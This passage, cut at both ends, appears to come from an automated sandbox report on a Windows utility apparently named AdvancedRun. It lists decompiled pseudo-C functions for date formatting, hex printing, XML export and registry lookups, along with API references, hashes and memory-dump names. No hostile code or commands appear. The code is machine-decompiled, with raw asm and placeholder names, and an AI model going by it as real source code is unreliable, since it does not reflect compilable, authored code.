					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}

APIs

memset.MSVCRT ref: 004036F6
memset.MSVCRT ref: 00403712

Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99

Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E

Part of subcall function 00405236: memset.MSVCRT ref: 00405257
Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA

GetSaveFileNameW.COMDLG32(?), ref: 004037AF
wcscpy.MSVCRT ref: 004037C3

Strings

L, xrefs: 0040378B
cfg, xrefs: 00403717

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
String ID: L$cfg
API String ID: 275899518-3734058911
Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}

0x00404ed0
0x00404edf
0x00404ef6
0x00000000
0x00404f00
0x00404f1c
0x00404f31
0x00404f41
0x00404f4e
0x00404f5d
0x00404f66
0x00404f69
0x00404f69
0x00404f71
0x00404f77
0x00404f7d

APIs

FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
wcscpy.MSVCRT ref: 00404F41
wcscat.MSVCRT ref: 00404F4E
wcscat.MSVCRT ref: 00404F5D
wcscpy.MSVCRT ref: 00404F71

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: Time$Formatwcscatwcscpy$DateFileSystem
String ID:
API String ID: 1331804452-0
Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}

APIs

memset.MSVCRT ref: 00405000
_snwprintf.MSVCRT ref: 00405027
wcscat.MSVCRT ref: 00405039
wcscat.MSVCRT ref: 00405056
wcscat.MSVCRT ref: 00405065

Strings

%2.2X, xrefs: 00405016

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$_snwprintfmemset
String ID: %2.2X
API String ID: 2521778956-791839006
Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC

Uniqueness

Uniqueness Score: -1.00%

Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}

APIs

memset.MSVCRT ref: 00407DA5
memset.MSVCRT ref: 00407DBA
_snwprintf.MSVCRT ref: 00407E04

Strings

<?xml version="1.0" ?>, xrefs: 00407DC9
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
<%s>, xrefs: 00407DF3

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}

0x00403b56
0x00403b5d
0x00403b6f
0x00403b76
0x00403b82
0x00403b8d
0x00403b8e
0x00403b99
0x00403b9e
0x00403b9f
0x00403ba7
0x00403bb9
0x00403bce
0x00403be5
0x00403bef
0x00403bf8
0x00403c00

APIs

memset.MSVCRT ref: 00403B5D
memset.MSVCRT ref: 00403B76

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

exefile, xrefs: 00403BAD
"%s" /EXEFilename "%%1", xrefs: 00403B8E
Advanced Run, xrefs: 00403BBE

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
API String ID: 1832587304-479876776
Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}

0x0040afd3
0x0040afe2
0x0040aff3
0x0040b002
0x0040b023
0x00000000
0x0040b047
0x0040b02e
0x0040b034
0x0040b03c
0x00000000

APIs

wcscpy.MSVCRT ref: 0040AFD3
wcscat.MSVCRT ref: 0040AFE2
wcscat.MSVCRT ref: 0040AFF3
wcscat.MSVCRT ref: 0040B002
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 004049A2: lstrcpyW.KERNEL32(?,?), ref: 004049B7
Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE

Strings

\StringFileInfo\, xrefs: 0040AFCD

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00405EB2
wcscpy.MSVCRT ref: 00405ED5

Strings

menu_%d, xrefs: 00405E96
dialog_%d, xrefs: 00405EA6
strings, xrefs: 00405EC0
general, xrefs: 00405ECB

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF

Uniqueness

Uniqueness Score: -1.00%

Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}

0x004092f3
0x004092fb
0x00409303
0x00409305
0x00409310
0x00409439
0x0040943f
0x00409445
0x0040944e
0x00409452
0x00409466
0x0040946e
0x00409475
0x004094f7
0x00409488
0x00409494
0x004094a5
0x004094a9
0x004094b5
0x004094c3
0x004094c6
0x004094d5
0x004094e3
0x004094f1
0x00000000
0x004094f1
0x00000000
0x004094e3
0x00000000
0x004094f7
0x00409452
0x00409322
0x0040932b
0x00409333
0x00409337
0x00409341
0x00409342
0x0040934e
0x0040934f
0x00409358
0x0040935e
0x0040935e
0x00409363
0x0040936b
0x0040936d
0x00409377
0x00409385
0x0040938d
0x0040939d
0x004093a5
0x004093ac
0x004093b4
0x004093c5
0x004093c9
0x004093da
0x004093df
0x004093e5
0x004093e6
0x004093ea
0x004093f6
0x004093fc
0x00409407
0x00409407
0x0040941d
0x00000000
0x00000000
0x00409423
0x00409428
0x00409375
0x00000000
0x00000000
0x0040942e
0x00000000
0x00409428
0x00409377
0x0040936d
0x004094fb
0x004094ff
0x004094ff
0x00409337
0x0040950f

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
memset.MSVCRT ref: 0040938D
memset.MSVCRT ref: 0040939D

Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233

memset.MSVCRT ref: 00409488
wcscpy.MSVCRT ref: 004094A9
CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x00402ed7
0x00402eee
0x00402ef8
0x00402f00
0x00402f01
0x00402f05
0x00402f0a
0x00402f1a
0x00402f30

APIs

GetClientRect.USER32 ref: 00402ED7
GetSystemMetrics.USER32 ref: 00402EE5
GetSystemMetrics.USER32 ref: 00402EF1
BeginPaint.USER32(?,?), ref: 00402F0B
DrawFrameControl.USER32 ref: 00402F1A
EndPaint.USER32(?,?), ref: 00402F27

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}

APIs

memset.MSVCRT ref: 004079DB

Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407A25

Strings

</item>, xrefs: 00407A41
<item>, xrefs: 004079AE
<%s>%s</%s>, xrefs: 00407A18

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}

0x00404683
0x00404692
0x00404699
0x0040469b
0x004046af
0x004046ba
0x004046bc
0x004046c7
0x004046cc
0x004046cd
0x004046ee
0x004046f3
0x004046fa
0x004046fa
0x004046ee
0x00404705

APIs

memset.MSVCRT ref: 004046AF
_snwprintf.MSVCRT ref: 004046CD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

%s\shell\%s, xrefs: 004046BC

Memory Dump Source

Source File: 0000000B.00000002.765299498.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.765285312.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765314693.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000B.00000002.765324867.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000B.00000002.765331164.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen_snwprintfmemset
String ID: %s\shell\%s
API String ID: 1458959524-3196117466
Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
